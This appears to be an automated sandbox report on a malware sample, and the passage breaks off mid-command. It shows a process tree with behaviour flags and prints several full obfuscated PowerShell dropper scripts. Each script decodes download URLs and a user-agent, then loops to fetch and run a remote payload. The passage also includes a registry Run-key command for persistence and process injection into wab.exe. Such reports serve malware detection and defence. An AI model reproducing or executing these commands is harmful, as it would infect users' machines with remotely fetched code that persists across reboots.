Krte(,rdsaTSprineDolces RetutBonm -InviaP LauraHarmatIlli,hSekit T.ion$ RoseBVintaaFlywhbOut.ie UralrLeaksyPanda)V.kar ') ;Everlastingness (Toxicarol 'den,i$,oublgFrperlplastoMu enb SmldamalcolSvige: Buk BTumbleVaticsPrdikkoutgayChartlEumerdMakken.mklaiSidevnIntelgPlaste Teutrunapp= With$VisaggOm.krlformyoTroldb auctaSolbrl,ryds: Ran,RHavn,a.lovnjTndstaObs,rb F ll+Orato+ Rati% Kula$Joks F A,yslGeni,k Rawlk pideBinokr C.ncnO.taee Unto9P.lar0Catal.RntgecKingboSandhuTeamwnAfkrvtAutog ') ;$Reembraced=$Flkkerne90[$Beskyldninger];}$Fortrdeligt=276508;$Elzevir=28490;Everlastingness (Toxicarol 'Skal.$ForhagReserl Bri oJeho,bBayadaFastflVgtfy:IngelDSuperi U.povAdveriIncons MilliThromoBetalnNa ursscamms ortytIrrenylib,lkF.arekpaarreA.klarRaffi Arc d=Cours LettiGUdskeeParamtReser-pre.sC Pr doBetonnNyctat.lideeLeuk,nSwit.tT,ien Fedt,$ virkBAlodiaGennebCrysteSp tnrHvledy C,sp ');Everlastingness (Toxicarol 'guine$Bortgg,drjelFernbo BvrebMdeafaBist,lU tra: PikaAM crot carbr Unr,oMorarpRee baEskadl Lngd G.ne=Gnocc Rais[OccipSEu,ogyGenn.sTra stSp nseOdourmBegyn. PorgCcunoioErg tnun nivUtraqe t.llr U,antCo,fi]Skatt:Baiss:M,ndaF.dofirkioskoBegynmSafiaB E shaTrawlsMal,tesuccu6 Disp4Lux mSNoctut .onorAnkeriRuskenPorthgCuvie(Riegg$AnhunD Filli Ratlv Metri,ackjsrhodoiSa,ono BekvnSup.rsDinossProc.tNonpeyMo,stkPs,rikKhedieEnounrM.net)impr. ');Everlastingness (Toxicarol 'Is,cy$,ispagMagmalPiacuoEmendbAutoeaBenvalPlopp:FlnsnFunderdAfstuesupervBarnaaDoctorPy.tee FurfgUnnomiRelapgLiteraSgninn strit.rodueNummen N.ndsBehnd Forz.=Ansva Hydr.[Su.erSGrabbyEntoms En etdupl e,ozjim Quin.SmagsTBebopeByggexBedmmtOligu.HelleE F.benTurnecAbciso ketcdAmy,oiSubwanEksorgAngos]Plott:Ende.: TerrABar,eSAb,ecC EvapIAmanuI Bore.DenerGG.likeSinditBe geSNedkrt Cr srRebooiDatasnto.chgFr mm(Conti$Stud.ATullit orserNaaleokit,bpU,veraZinkklFrste) Nota ');Everlastingness (Toxicarol 'Absci$ByplagKate.lLogaro Barib unloaMensalEnkel:,estiDSoleneMonisw .ammcOrakzlTentiaTi,uswDesc sJackw=H,sto$BestrFB,urpdBlindeDiplov Che.a skibrKoftee,odskg BygaiFormagTosidaNeddynDesigtAfgifeAfhjen placsKostu. EpicsSat uuVivipbEgenasVolustBlodkrVocabiDisv,n salagNonpu(Nidor$ValinFStbeno gemirS multBlastr.rimid .isseLandsl.unnii Sinkgs.vtjtPostt, Nons$Cinc,E Bridl te.rzC.arlebe.davba.thiInconr T.rn)coffi ');Everlastingness $Dewclaws;"
3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4844

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Deddy.Dog && echo $"
4⤵
PID:2680

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3472

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Transplantationen% -w 1 $Honnrmarchs=(Get-ItemProperty -Path 'HKCU:\Leadenpated\').Jugoslavere;%Transplantationen% ($Honnrmarchs)"
5⤵
- Suspicious use of WriteProcessMemory
PID:3984

C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Transplantationen% -w 1 $Honnrmarchs=(Get-ItemProperty -Path 'HKCU:\Leadenpated\').Jugoslavere;%Transplantationen% ($Honnrmarchs)"
6⤵
- Adds Run key to start application
- Modifies registry key
PID:4680

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\zaokti.vbs"
5⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1764

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Siccimeter = 1;$Wattmetre='Su';$Wattmetre+='bstrin';$Wattmetre+='g';Function Alethoscope71($Drmmeanalysernes){$Corsage=$Drmmeanalysernes.Length-$Siccimeter;For($Falsummer=5;$Falsummer -lt $Corsage;$Falsummer+=6){$Imperalistiske+=$Drmmeanalysernes.$Wattmetre.Invoke( $Falsummer, $Siccimeter);}$Imperalistiske;}function zabra($Overproportion){& ($Myrdedes) ($Overproportion);}$Eneanpartshavernes=Alethoscope71 'FormiM Af.aoNattez,ndusiL.ffalAvan l MascaMoent/Sknhe5 Avol.,lmue0backs Sch.s(M teoW Hamfi Auton Uns,dFl.oro CentwGenins Mon. klunsN PoteTPoste Ca.t1Limbe0 itri.Biobi0Ra,df;lini. BlikvWStu.ei Be.rn illm6 Euf,4Sq.ir;T,der Quifx anti6pro.i4Karkl; Inte PrsumrDetecvFyld.:Cacci1 Stag2 ,iss1O.era.Eutr 0Studi)Pseud ,nklaGAse aeTranqcDipalkThorvo Sikk/Ungua2Ydmy.0Unmon1Eurov0 Sylv0Cirku1.udde0Disse1Unmem For dFInteriredigrKunsteStdvif BegaoGast x Genn/P.lst1Spill2.othe1Grube.,rogl0 samm ';$Disaccharidase=Alethoscope71 'oprusUSupersElenieVrelsrVeinw-Ef,erAVintegjuri,ezeb.anDissttHalvs ';$Gennemblades=Alethoscope71 'ska,th VicetDebatt.aarepFrdses.ager:Oppr,/V.ola/ ysiuwRekrewFlagrw Unin.,emissLivske ForrnServodUndubs OverpDomi,aSkrkkcElecte Dubl.Forf,cC mpeoVankemTra.s/ Fo,kpDyr er.morooSub,e/ BistdFatesl Symp/HavbiaNonopz CatakBogbijMonadmGra,ifDjvle ';$Bedstevenners=Alethoscope71 'Swash> hyro ';$Myrdedes=Alethoscope71 'BedcoiCompreFeminxServa ';$Renteflsomme='Superjudicial175';zabra (Alethoscope71 'FotomSM ifeeEndomtMatfe- OverCPirogoData n Hao,tJuleaeUdmntnClau tTrldo Unnat-,pkalPCa.dia HingtGoddeh Impa IntelTFri r:maelk\NavneR PastuW.relsBefritBl.esi,meltcP,rveaQua.itMarkio DuscrAngor.Br.set StevxIntertvandf Amfi-Ho blV GaleaV,ljel JunguOfftreKarte Ri al$Tra kRAlkaleUf ldnGipsetL ndeeTils,fAtmialO tplsAutomoG,nnemorddemTi,everot t;Ne.ri ');zabra (Alethoscope71 'unpariSwayef Wamu schem(L.ramtWirepeHypsos Sammt,sfor-IcierpToranaOsseotVideohHeadl HiemaTP,ila:Evang\L dskRCircuuSubresBannet StoniTropic,oenta BandtRicksoFolk.rN.hil..eclitC cloxHamalt Cope) Leve{ OrnaeAmortxTar.aiLineatP rri} Pott; R ma ');$Informationsmaengder = Alethoscope71 'JuleseSerpecProtohOutgroFader Serap%Genfra UnivpDarbhp ,amadF rtoaRefortderriaCoact%Phosp\.ronuiAlgols Sym.oFor.ilHerreiMong nSnoreo LefllSpu seOv.rsn Lyg iBekk,c ivsb. TranO Jap vS,rumeOppus Sap n&Pasi,&Under Miljme P.loc HydrhHe.ocoAgter Calin$Sterl ';zabra (Alethoscope71 'Gifte$ Affig,anagl,ubapo.nwrabAmbita CykllKonst:RessoG ranrS.aaruIstann f ysdStepcmF raguSkrumr,nifie Om,ln ypoce,onsts,arie= Bouc(Sr,lac nstimStaklduns,c Bagg/ BouncDeis Samm$JeppeI stornKartefcalcioTil,grArsenmSkiftaSymb tRegnsiAfko ouddran Torbs Cashm p tiaShoddeTimotnKvintgsubduddiamie Hum.rAchiy) Farm ');zabra (Alethoscope71 'H ssa$OutcagovertlUnunaoN,nfob RailaP.litlBifen: NontFStep.oSpectrengrau Afgar.onceeVernanBn,haeWrastnPseuddAf,oleKapu,=Parae$ nalGLeucieStammn,dtalnR ordeBomrkmIn robAntholSlo pa.ulindHi.dreHumansFirs,.Rekurs NongpGun ylCongriStrejtElect(Mumps$EfterBst tieTupi,dNedt sWestmt .vere My ev RecoeKniv,n ElsknRectoeDragorVirkesSlimp)D.flj ');$Gennemblades=$Forurenende[0];zabra (Alethoscope71 'B.rts$MacbegNonfulMultioNy.rubGurura .umplTo ga:MasteZ .ncui NonhsSkrvik Ve.iaStvne=JakfrNPareneGrundwBlomk-DroluOtelttbBeastjLignieK adrcVariatUnpop K ubSWreakyNon.as.unnetWereceFl gemK.ind. Vi eNInconeUncontUnshr. Hi,cWVrange plusb M.skCPrieslBick iClubbeOluffn prertRhode ');zabra (Alethoscope71 'Akva $In.viZWithbiThatcs ColikDiffea Tita.Lum,iH uffye pe,sa pild Bib eProtorWholesUimod[Li us$SocioD AsieiFacilsLicheaJ ssicSpyttc SemihKom aacogwar Spili .ensd MollaHumilsSyndeeEkste] Nonl=odont$kompoEIsoninTagale,meriaLacemnRefunp,lectaNoncorM llotLigemsSkntrhBogklaJalouvFooteeAlterrForstnSikkeeDitzssV,lla ');$Bronchitic=Alethoscope71 ' GrovZBlackiStoolsHe stkAffa.aTheat. grnsDExspooForhawAilannCoupllV teroBiporaScorid,tomaFUnridiproc.lp osleChris( Bout$ rillGSkammeAutornSalignDiscoeBjergmgrandb fo,tlModviaAfkoldmyth eAnfrbsAudie,Gipsb$IntonSDickipTeariaM trotBootpcAfmyth M.ttc Skrio W aicA,bifkblitz5 Serv9F.urn)Laser ';$Bronchitic=$Grundmurenes[1]+$Bronchitic;$Spatchcock59=$Grundmurenes[0];zabra (Alethoscope71 'Rots.$Helbrg Alsil Ove,o highbSkovlaPneumlFleur:JurisIWallsn,entes OpkaeSk,bmcGasrat St miBlybacPederiSynkrdambl,e Naba=Unbod(Bill,Tflosse.nucksNormatS ffi- fortPMisusa I.ddt NedshLovre Cryp$RaciaSHjemmpRenalaGenn.tTildicNetvrh.ragtcUngluoF.rfucValgfkO erp5K pec9,onde)troll ');while (!$Insecticide) {zabra (Alethoscope71 'Natti$HowbegDrainlAntifo A trbErranaMudlal ogu:SemipDCumuleOriensCobe.a DatavJenskoRealkuDundeevinkorForsaiFedernUrceogPigede .midrBek e=Pancr$ Tr,mtAfm trBo.bouAdulte aver ') ;zabra $Bronchitic;zabra (Alethoscope71 'BarriSGenictKlokkaKonger.ndskt Cann- SkydSPar,ilP kleeendetePyn epbebyr Inval4,even ');zabra (Alethoscope71 ' Sigj$GarangMinimlDe onoTnkelb SheoaClunilKarnf:redisIHeartnSl ntsNedskeUncencSign.tArmodiFagkycChalciCeratdSol ee Out =Efter( agneTe traedokumsslurrthenty-Clot,PSixmoa SenotguayahMind. Waggo$U.ennSSamm.pAfs,aaBeln tPoticcSiderhTenorc Jv,doF rehc DebikUnali5Elysi9 Cut )urost ') ;zabra (Alethoscope71 ' Re.r$Indbyg FordlPlejeoStra bSubpaaAutoml Kloe: Da.sT udseiUdty lBlackoBekymrDis rd Zinkn Cry,e sej r,yrre=Ortho$ Ch,sgPejlelReso,oL irsbrekuraIchthl Epim: JellB LittaCrabbrElgt,sCalloeRkenvlVesicsA.vorf EgeteDeklibFreckePa.opr lomeAntidnKa nfsAppri+Mispr+Markh%Tekst$KaadmFRicheoChaenr Mod.uLimonrLovf,epasfonBetraeMicr.nYdelsdSupereNipsg.SprawcWau hoUn.esuPtpconAfladtVisar ') ;$Gennemblades=$Forurenende[$Tilordner];}$Skandinaviensrejses=322661;$Thirlages=28492;zabra (Alethoscope71 'Suf l$Br.dygVe nulvagtsolysebb enoaIndstl nons:FagspB Lig l a,atl LerseSaledh AwheaHa,ket SelftSpagne ejrsnTeksteVa,visOntic1Afdel1Spoon2,pith Adjus=k.nce ForstG AfhoePers,tSvir.-B.edeCKarakoVortin KulttNow,seGi.nenFritntKlode Ident$Ta,waS.utodpPasseaHy letC,chlcHorolhtossecSalitoS.ckecOncogkJoz.t5Filla9 Skue ');zabra (Alethoscope71 ' gal $ThumbgFremslPurrioDeallbA.ayraB.fiplTersh:RadioDLa,ahiNon.ra,ndgigCeleboNorm,nU fsliPickwa.nthrlDrnud cutic=Prekr s,il[J rypSAfklay Tur,s krumtE.peceStendmFer,i.TelefC .freoKonson DodevTeglveReassrScaputCeleb]cit,u:Servo:MissiFRetorrTota,oDesmomkanflBDeriva Exp.sEudioePtole6S lia4 MokkS PlastUsa,drSelskiVandrn TuyegA,chc(Short$KlageB EnkelEjendl Fa teUn.lah LifeaasmintLitzytT asseClearnSto.deSamfusOxidi1 Sasa1Ho,er2Sa,ro)iodin ');zabra (Alethoscope71 ' .pid$AutorgOcea.lAk.ioo vintbT,deraBeb,tl rahm:SprinN IndeaBadehtI,plauPrebrr Kvi,fBefalr Han.e BrnddSimrenFi,mkiKraten iligg Br dsFoste Kab n=Recep fre m[fasefSFlintynit,nsEvangt Forse RevymBytte.GastrTPositeP.lerx D,ejtBests.LaminEFremsn Unm,cSe,teoFeme.dTypoliOuttrnTordig Vach]Outwa:Skovl:EnsluAI,serSSuperCReassIAlsidIiskol.flereGGalvae Sh,utImmunSP,iretStjdmrSlagtiC ntanOpiumgJann,( Bell$ DeriD SuttiI.conaJuntagS.ovsov rianPre ci befsaOutkilUnree)Tcha, ');zabra (Alethoscope71 'Inven$B.elagTempelrussioPhacobUntemaSelvblGlory:HardbSBowshc ForsuChemitRemuluA,kohl Seksaranie=Disas$SemipNRepada Mar.tBibelu F rmr ThyrfBritir.rimreIs.eldUgyldnAn.rkiKer tn Unimg.etodsFdeva. SporsDazaeuPha ib C.thsToxaet M elrNonriiLaesenxylopg.efec( Rigs$ AgreSEjerskBefola Tes.nRundkd LisciSur,enFordjaInterv tilii Spile EksanA ades Ku,trSti,ce,edbrjEcurisDdsn.e TransUnder,Borde$Jami,T kapihSaloniKowtor dew,lEquivaSulevg quire S.avs Deci)primf ');zabra $Scutula;"
6⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1784

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\isolinolenic.Ove && echo $"
7⤵
PID:3532

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Siccimeter = 1;$Wattmetre='Su';$Wattmetre+='bstrin';$Wattmetre+='g';Function Alethoscope71($Drmmeanalysernes){$Corsage=$Drmmeanalysernes.Length-$Siccimeter;For($Falsummer=5;$Falsummer -lt $Corsage;$Falsummer+=6){$Imperalistiske+=$Drmmeanalysernes.$Wattmetre.Invoke( $Falsummer, $Siccimeter);}$Imperalistiske;}function zabra($Overproportion){& ($Myrdedes) ($Overproportion);}$Eneanpartshavernes=Alethoscope71 'FormiM Af.aoNattez,ndusiL.ffalAvan l MascaMoent/Sknhe5 Avol.,lmue0backs Sch.s(M teoW Hamfi Auton Uns,dFl.oro CentwGenins Mon. klunsN PoteTPoste Ca.t1Limbe0 itri.Biobi0Ra,df;lini. BlikvWStu.ei Be.rn illm6 Euf,4Sq.ir;T,der Quifx anti6pro.i4Karkl; Inte PrsumrDetecvFyld.:Cacci1 Stag2 ,iss1O.era.Eutr 0Studi)Pseud ,nklaGAse aeTranqcDipalkThorvo Sikk/Ungua2Ydmy.0Unmon1Eurov0 Sylv0Cirku1.udde0Disse1Unmem For dFInteriredigrKunsteStdvif BegaoGast x Genn/P.lst1Spill2.othe1Grube.,rogl0 samm ';$Disaccharidase=Alethoscope71 'oprusUSupersElenieVrelsrVeinw-Ef,erAVintegjuri,ezeb.anDissttHalvs ';$Gennemblades=Alethoscope71 'ska,th VicetDebatt.aarepFrdses.ager:Oppr,/V.ola/ ysiuwRekrewFlagrw Unin.,emissLivske ForrnServodUndubs OverpDomi,aSkrkkcElecte Dubl.Forf,cC mpeoVankemTra.s/ Fo,kpDyr er.morooSub,e/ BistdFatesl Symp/HavbiaNonopz CatakBogbijMonadmGra,ifDjvle ';$Bedstevenners=Alethoscope71 'Swash> hyro ';$Myrdedes=Alethoscope71 'BedcoiCompreFeminxServa ';$Renteflsomme='Superjudicial175';zabra (Alethoscope71 'FotomSM ifeeEndomtMatfe- OverCPirogoData n Hao,tJuleaeUdmntnClau tTrldo Unnat-,pkalPCa.dia HingtGoddeh Impa IntelTFri r:maelk\NavneR PastuW.relsBefritBl.esi,meltcP,rveaQua.itMarkio DuscrAngor.Br.set StevxIntertvandf Amfi-Ho blV GaleaV,ljel JunguOfftreKarte Ri al$Tra kRAlkaleUf ldnGipsetL ndeeTils,fAtmialO tplsAutomoG,nnemorddemTi,everot t;Ne.ri ');zabra (Alethoscope71 'unpariSwayef Wamu schem(L.ramtWirepeHypsos Sammt,sfor-IcierpToranaOsseotVideohHeadl HiemaTP,ila:Evang\L dskRCircuuSubresBannet StoniTropic,oenta BandtRicksoFolk.rN.hil..eclitC cloxHamalt Cope) Leve{ OrnaeAmortxTar.aiLineatP rri} Pott; R ma ');$Informationsmaengder = Alethoscope71 'JuleseSerpecProtohOutgroFader Serap%Genfra UnivpDarbhp ,amadF rtoaRefortderriaCoact%Phosp\.ronuiAlgols Sym.oFor.ilHerreiMong nSnoreo LefllSpu seOv.rsn Lyg iBekk,c ivsb. TranO Jap vS,rumeOppus Sap n&Pasi,&Under Miljme P.loc HydrhHe.ocoAgter Calin$Sterl ';zabra (Alethoscope71 'Gifte$ Affig,anagl,ubapo.nwrabAmbita CykllKonst:RessoG ranrS.aaruIstann f ysdStepcmF raguSkrumr,nifie Om,ln ypoce,onsts,arie= Bouc(Sr,lac nstimStaklduns,c Bagg/ BouncDeis Samm$JeppeI stornKartefcalcioTil,grArsenmSkiftaSymb tRegnsiAfko ouddran Torbs Cashm p tiaShoddeTimotnKvintgsubduddiamie Hum.rAchiy) Farm ');zabra (Alethoscope71 'H ssa$OutcagovertlUnunaoN,nfob RailaP.litlBifen: NontFStep.oSpectrengrau Afgar.onceeVernanBn,haeWrastnPseuddAf,oleKapu,=Parae$ nalGLeucieStammn,dtalnR ordeBomrkmIn robAntholSlo pa.ulindHi.dreHumansFirs,.Rekurs NongpGun ylCongriStrejtElect(Mumps$EfterBst tieTupi,dNedt sWestmt .vere My ev RecoeKniv,n ElsknRectoeDragorVirkesSlimp)D.flj ');$Gennemblades=$Forurenende[0];zabra (Alethoscope71 'B.rts$MacbegNonfulMultioNy.rubGurura .umplTo ga:MasteZ .ncui NonhsSkrvik Ve.iaStvne=JakfrNPareneGrundwBlomk-DroluOtelttbBeastjLignieK adrcVariatUnpop K ubSWreakyNon.as.unnetWereceFl gemK.ind. Vi eNInconeUncontUnshr. Hi,cWVrange plusb M.skCPrieslBick iClubbeOluffn prertRhode ');zabra (Alethoscope71 'Akva $In.viZWithbiThatcs ColikDiffea Tita.Lum,iH uffye pe,sa pild Bib eProtorWholesUimod[Li us$SocioD AsieiFacilsLicheaJ ssicSpyttc SemihKom aacogwar Spili .ensd MollaHumilsSyndeeEkste] Nonl=odont$kompoEIsoninTagale,meriaLacemnRefunp,lectaNoncorM llotLigemsSkntrhBogklaJalouvFooteeAlterrForstnSikkeeDitzssV,lla ');$Bronchitic=Alethoscope71 ' GrovZBlackiStoolsHe stkAffa.aTheat. grnsDExspooForhawAilannCoupllV teroBiporaScorid,tomaFUnridiproc.lp osleChris( Bout$ rillGSkammeAutornSalignDiscoeBjergmgrandb fo,tlModviaAfkoldmyth eAnfrbsAudie,Gipsb$IntonSDickipTeariaM trotBootpcAfmyth M.ttc Skrio W aicA,bifkblitz5 Serv9F.urn)Laser ';$Bronchitic=$Grundmurenes[1]+$Bronchitic;$Spatchcock59=$Grundmurenes[0];zabra (Alethoscope71 'Rots.$Helbrg Alsil Ove,o highbSkovlaPneumlFleur:JurisIWallsn,entes OpkaeSk,bmcGasrat St miBlybacPederiSynkrdambl,e Naba=Unbod(Bill,Tflosse.nucksNormatS ffi- fortPMisusa I.ddt NedshLovre Cryp$RaciaSHjemmpRenalaGenn.tTildicNetvrh.ragtcUngluoF.rfucValgfkO erp5K pec9,onde)troll ');while (!$Insecticide) {zabra (Alethoscope71 'Natti$HowbegDrainlAntifo A trbErranaMudlal ogu:SemipDCumuleOriensCobe.a DatavJenskoRealkuDundeevinkorForsaiFedernUrceogPigede .midrBek e=Pancr$ Tr,mtAfm trBo.bouAdulte aver ') ;zabra $Bronchitic;zabra (Alethoscope71 'BarriSGenictKlokkaKonger.ndskt Cann- SkydSPar,ilP kleeendetePyn epbebyr Inval4,even ');zabra (Alethoscope71 ' Sigj$GarangMinimlDe onoTnkelb SheoaClunilKarnf:redisIHeartnSl ntsNedskeUncencSign.tArmodiFagkycChalciCeratdSol ee Out =Efter( agneTe traedokumsslurrthenty-Clot,PSixmoa SenotguayahMind. Waggo$U.ennSSamm.pAfs,aaBeln tPoticcSiderhTenorc Jv,doF rehc DebikUnali5Elysi9 Cut )urost ') ;zabra (Alethoscope71 ' Re.r$Indbyg FordlPlejeoStra bSubpaaAutoml Kloe: Da.sT udseiUdty lBlackoBekymrDis rd Zinkn Cry,e sej r,yrre=Ortho$ Ch,sgPejlelReso,oL irsbrekuraIchthl Epim: JellB LittaCrabbrElgt,sCalloeRkenvlVesicsA.vorf EgeteDeklibFreckePa.opr lomeAntidnKa nfsAppri+Mispr+Markh%Tekst$KaadmFRicheoChaenr Mod.uLimonrLovf,epasfonBetraeMicr.nYdelsdSupereNipsg.SprawcWau hoUn.esuPtpconAfladtVisar ') ;$Gennemblades=$Forurenende[$Tilordner];}$Skandinaviensrejses=322661;$Thirlages=28492;zabra (Alethoscope71 'Suf l$Br.dygVe nulvagtsolysebb enoaIndstl nons:FagspB Lig l a,atl LerseSaledh AwheaHa,ket SelftSpagne ejrsnTeksteVa,visOntic1Afdel1Spoon2,pith Adjus=k.nce ForstG AfhoePers,tSvir.-B.edeCKarakoVortin KulttNow,seGi.nenFritntKlode Ident$Ta,waS.utodpPasseaHy letC,chlcHorolhtossecSalitoS.ckecOncogkJoz.t5Filla9 Skue ');zabra (Alethoscope71 ' gal $ThumbgFremslPurrioDeallbA.ayraB.fiplTersh:RadioDLa,ahiNon.ra,ndgigCeleboNorm,nU fsliPickwa.nthrlDrnud cutic=Prekr s,il[J rypSAfklay Tur,s krumtE.peceStendmFer,i.TelefC .freoKonson DodevTeglveReassrScaputCeleb]cit,u:Servo:MissiFRetorrTota,oDesmomkanflBDeriva Exp.sEudioePtole6S lia4 MokkS PlastUsa,drSelskiVandrn TuyegA,chc(Short$KlageB EnkelEjendl Fa teUn.lah LifeaasmintLitzytT asseClearnSto.deSamfusOxidi1 Sasa1Ho,er2Sa,ro)iodin ');zabra (Alethoscope71 ' .pid$AutorgOcea.lAk.ioo vintbT,deraBeb,tl rahm:SprinN IndeaBadehtI,plauPrebrr Kvi,fBefalr Han.e BrnddSimrenFi,mkiKraten iligg Br dsFoste Kab n=Recep fre m[fasefSFlintynit,nsEvangt Forse RevymBytte.GastrTPositeP.lerx D,ejtBests.LaminEFremsn Unm,cSe,teoFeme.dTypoliOuttrnTordig Vach]Outwa:Skovl:EnsluAI,serSSuperCReassIAlsidIiskol.flereGGalvae Sh,utImmunSP,iretStjdmrSlagtiC ntanOpiumgJann,( Bell$ DeriD SuttiI.conaJuntagS.ovsov rianPre ci befsaOutkilUnree)Tcha, ');zabra (Alethoscope71 'Inven$B.elagTempelrussioPhacobUntemaSelvblGlory:HardbSBowshc ForsuChemitRemuluA,kohl Seksaranie=Disas$SemipNRepada Mar.tBibelu F rmr ThyrfBritir.rimreIs.eldUgyldnAn.rkiKer tn Unimg.etodsFdeva. SporsDazaeuPha ib C.thsToxaet M elrNonriiLaesenxylopg.efec( Rigs$ AgreSEjerskBefola Tes.nRundkd LisciSur,enFordjaInterv tilii Spile EksanA ades Ku,trSti,ce,edbrjEcurisDdsn.e TransUnder,Borde$Jami,T kapihSaloniKowtor dew,lEquivaSulevg quire S.avs Deci)primf ');zabra $Scutula;"
7⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4560

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\isolinolenic.Ove && echo $"
8⤵
PID:876

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
8⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:4072

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ndhnsi.vbe"
5⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4264

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Drepanium = 1;$Stratifications='Su';$Stratifications+='bstrin';$Stratifications+='g';Function Stueetagernes($Roentgenometry){$Photoceramic=$Roentgenometry.Length-$Drepanium;For($Flagliners=5;$Flagliners -lt $Photoceramic;$Flagliners+=6){$Oprrt+=$Roentgenometry.$Stratifications.Invoke( $Flagliners, $Drepanium);}$Oprrt;}function Pensionsopsparing($Tyndslidnings){& ($liliales) ($Tyndslidnings);}$Trenails=Stueetagernes 'GuttuMBuroboCitroz Disai U,volwhizzl aksea Vulg/teate5Taras.Hjemt0dil,e Dy st( AntiWLar.ii UntrnflagmdD,savo Ro,gwRephosHimme IntimN.lderTMis c Vragr1Cip l0Plat .varmt0Unlea;Gift, kbestWAvlsaiStramn Char6De.on4Autoc;Disha chinax Unam6Mods.4Exoph;Win b CrestrKrigsvAdo t:guzzl1 S,hy2M,ner1Parah.Cep.a0Adhib)venia R,bbiG AdvaeOverccHy,erkC,vitoTypol/Ma,or2Emigr0 Frem1 .dmi0P,rom0 Retr1Semim0C.lor1Savvr kygFd.omai PjusrIodode M,refLa,dgo Ise.xMulti/Torte1recur2 weet1Undre.Potch0Vejle ';$Naturaliseredes=Stueetagernes ' B.llUNonsas Irr.eTravhrVans.-StrikA OvergCovereVirginOmstrtMoh,l ';$Snurrende=Stueetagernes 'Ston,hWerchten latCentrp ForusSkral:Bolsm/Short/Stjerr Tun a CommnFortrcP kalhBel.sokuldkb tepho,nplisParlocPoly,aFritsrOutmadBetryiUltranEnerg.Snn kc AmauoThro.m eser.CicerbsongirWen,y/UhomodGynaecEnsar/,egonAPropes.orklyBa ton Semiabombsr PagitDiffeeEntret .agbeSwobb.Blistc Or lsInconvKombi ';$Skudviddernes=Stueetagernes ' forh>Count ';$liliales=Stueetagernes 'VakleiFlicke Gerax Ord. ';$Breplaner='astrobiologists';Pensionsopsparing (Stueetagernes 'MilieS s lae,ultutDemol- JugeCF,stfoSkridnInq itBe gaePrefen stattTrans aske-CapitPHovedaMissttSimulh Mech SkrigTMine.:Educa\SedenSMossikHostaoSemidvApp.obLaotsrModiaukennegNattes,oolaeOrdinrBismehN ncovKrsuseMetacrBjer,vDrgnieHerpenUnhaleFalsksStofm.Mislit GlasxOrthot Meth Jenk- L,ndV G.unaBet,ll FibruOpgave Tryk Kaste$OfficB Budgrethoxe ariapMillil E,skaM llenSkolee UncarFront;Jateo ');Pensionsopsparing (Stueetagernes 'LiveniTako,f Revi Yello(SaccatRou,eePilotsOrdgytBonni-CrepepEgoi,aGdsketUnsuphSkov EnwheTIndfl:Dsene\TypotSLsladkKur toOculiv Listb,tindr fi euTude,gDekonsUdkikeCommor.vdinh Svinv MelleUd.anrT ehuvMigraeStaalnNonirelongisPhoto.AvicutWeedaxFrouzt.otel)Chrom{ unexe uerixov.rbiBras t naer}Terre;S rin ');$Nongipsy = Stueetagernes ' ReoxeRe.nfc Joy,hO,holoBesyv ,nde% .orga AmospStrafp.rsted .ugaaPseudt Hy raPter.%Incit\ VentTM.anercad.uiJenopnMd.staZoochtinomyi LeptoBundtnB odk.ca.arFDimitoSporor Cock Rata&Und i&Congl For.e ScoucBlndehredskoAr aw Be et$tox,c ';Pensionsopsparing (Stueetagernes 'Fedth$ BurggCh kelTodagoRegnsbpelleaOttrol Delt:ConceN ,asiaBveruvVulk,i KanegM,sleaIndi.b HamseSchellSilve= Omla(StyrtcMatrimTornedEpicr Pal i/ Rhe c Efte halsh$StabiN,kydeoKiwifnO.ersgRaf,ei I depPur,isNitriyWi,he)Wheat ');Pensionsopsparing (Stueetagernes 'Flels$ForfogIntellJac,aoRam.ib VoweaKbeb lTrans:SadelJInficaWleccmAtlanwYearnoRe idoNullsd ,oem1 Har,7Tutel5Bille=Ant.g$N,tamSJ,rdsnStatsuReharrM.rcerBogt e forsnSl,ngdKodeoeMixti.Fn mes Ekspp 